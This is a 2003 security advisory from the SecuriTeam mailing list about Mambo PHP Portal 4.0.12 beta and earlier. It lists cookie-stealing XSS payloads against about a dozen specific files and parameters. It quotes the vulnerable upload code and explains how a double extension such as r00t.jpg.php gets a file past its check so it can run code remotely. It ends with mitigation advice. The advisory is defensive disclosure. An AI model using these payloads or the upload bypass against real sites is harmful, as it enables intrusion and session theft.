[UNIX] Mambo PHP-Portal Vulnerability (XSS and Command Execution)

From: support@securiteam.com
Date: 01/12/03

  • Next message: support@securiteam.com: "[TOOL] NBTdeputy, NetBIOS Swiss Knife" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 12 Jan 2003 18:26:21 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Mambo PHP-Portal Vulnerability (XSS and Command Execution)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.mamboserver.com/> Mambo Site Server is a website portal tool
    written in PHP. A couple of vulnerabilities have been discovered including
    XSS and Remote Code Execution on the server with server permissions. A
    couple of includes and upload codes do not check for admin access or any
    type of restriction and allow attackers to run arbitrary code without
    permission.

    DETAILS

    Vulnerable systems:
     * Mambo PHP Portal version 4.0.12 BETA and prior

    Cross Site Scripting:
    XSS exist in the following files and possibly in a couple more.
    administrator/popups/sectionswindow.php (type=web&link="<
    script>alert(document.cookie)</script>
    administrator/gallery/gallery.php (directory="<
    script>alert(document.cookie)</script>)
    administrator/gallery/navigation.php (directory="<
    script>alert(document.cookie)</script>)
    administrator/gallery/uploadimage.php (directory="<
    script>alert(document.cookie)</script>)
    administrator/gallery/view.php (path="<
    script>alert(document.cookie)</script>)
    administrator/upload.php (newbanner=1&choice="<
    script>alert(document.cookie)</script>)
    themes/mambosimple.php (detection=detected&sitename=</title><
    script>alert(document.cookie)</script>)
    upload.php (type="< script>alert(document.cookie)</script>)
    emailfriend/emailarticle.php (id="<
    script>alert(document.cookie)</script>)
    emailfriend/emailfaq.php (id="< script>alert(document.cookie)</script>)
    emailfriend/emailnews.php (id="< script>alert(document.cookie)</script>)

    Remote Arbitrary Code Execution
    A remote command execution vulnerability was found in the gallery image
    uploading utility under administrator directory.

    administrator/gallery/uploadimage.php

    (These are also exploitable: upload.php and administrator/upload.php)

    Apparently, this file allows any remote and local users to upload 'images'
    to the server without checking for any permission settings. By tricking
    the badly written file extension security check, an attacker can upload
    any type of arbitrary files to the server.

    Exploit:
    The following code can be found inside uploadimage.php file.
    .
    if (isset($fileupload)){
    if ($directory!="uploadfiles"){
    $base_Dir = "../../images/stories/";
    }else{
    $base_Dir = "../../uploadfiles/$Itemid/";
    }

    $filename = split("\.", $userfile_name);
    if (eregi("[^0-9a-zA-Z_]", $filename[0])){
    print "<SCRIPT> alert('File must only contain alphanumeric characters and
    no spaces please.'); window.history.go(-1);</SCRIPT>\n";
    exit();
    }

    if (file_exists($base_Dir.$userfile_name)){
    print "<SCRIPT> alert('Image $userfile_name already exists.');
    window.history.go(-1);</SCRIPT>\n";
    exit();
    }

    if ((!eregi(".gif", $userfile_name)) && (!eregi(".png", $userfile_name))
    && (!eregi(".jpg", $userfile_name)) && (!eregi(".doc", $userfile_name))&&
    (!eregi(".xls", $userfile_name))&& (!eregi(".swf", $userfile_name)) &&
    (!eregi(".pdf", $userfile_name))){
    print "<SCRIPT>alert('The file must be pdf, gif, png, jpg, doc, xls or
    swf'); window.history.go(-1);</SCRIPT>\n";
    exit();
    }

    if ((eregi(".pdf", $userfile_name)) || (eregi(".doc", $userfile_name)) ||
    (eregi(".xls", $userfile_name))){
    if (!copy($userfile, $pdf_path.$userfile_name)){
    echo "Failed to copy $userfile_name";
    }
    }
    elseif (!copy($userfile, $base_Dir.$userfile_name)){
    echo "Failed to copy $userfile_name";
    }

    if (eregi(".jpg", $userfile_name)){
    print
    "<SCRIPT>top.window.images.document.location.href=\"index.php?gal=0&image=jpg&directory=$directory&Itemid=$Itemid\"</SCRIPT>\n";
    }
    elseif (eregi(".pdf", $userfile_name)){
    print
    "<SCRIPT>top.window.images.document.location.href='pdf.php'</SCRIPT>\n";
    }
    if (eregi(".png", $userfile_name)){
    print
    "<SCRIPT>top.window.images.document.location.href=\"index.php?gal=0&image=png&directory=$directory&Itemid=$Itemid\"</SCRIPT>\n";
    }
    else {
    print
    "<SCRIPT>top.window.images.document.location.href=\"index.php?gal=0&image=gif&directory=$directory&Itemid=$Itemid\"</SCRIPT>\n";
    }
    }

    .

    First things first:

    if (isset($fileupload)){
    if ($directory!="uploadfiles"){
    $base_Dir = "../../images/stories/";
    }else{
    $base_Dir = "../../uploadfiles/$Itemid/";
    }

    Just sets the directory in which the files will be uploaded to. We can
    leave both $directory and $fileupload empty.

    Now lets examine the 'security check' that is included in this code:
    if ((!eregi(".gif", $userfile_name)) && (!eregi(".png", $userfile_name))
    && (!eregi(".jpg", $userfile_name)) && (!eregi(".doc", $userfile_name))&&
    (!eregi(".xls", $userfile_name))&& (!eregi(".swf", $userfile_name)) &&
    (!eregi(".pdf", $userfile_name))){

    As you can or cannot see, the function eregi() only checks if the '.ext'
    are located inside the string $userfile_name, but does not check if they
    end with that extension. The attacker can just rename his file to
    r00t.jpg.php and upload without any warnings.

    After uploading the arbitrary file successfully, the attacker just needs
    to activate his code by calling /images/stories/r00t.jpg.php and he's got
    remote access to the server with server permissions.

    Solution:
    Please check the vendor's website for new patches.

    Meanwhile you should remove the following files from your server:
     * upload.php
     * administrator/upload.php
     * administrator/gallery/uploadimage.php

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:mindwarper@hush.com>
    Mindwarper.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages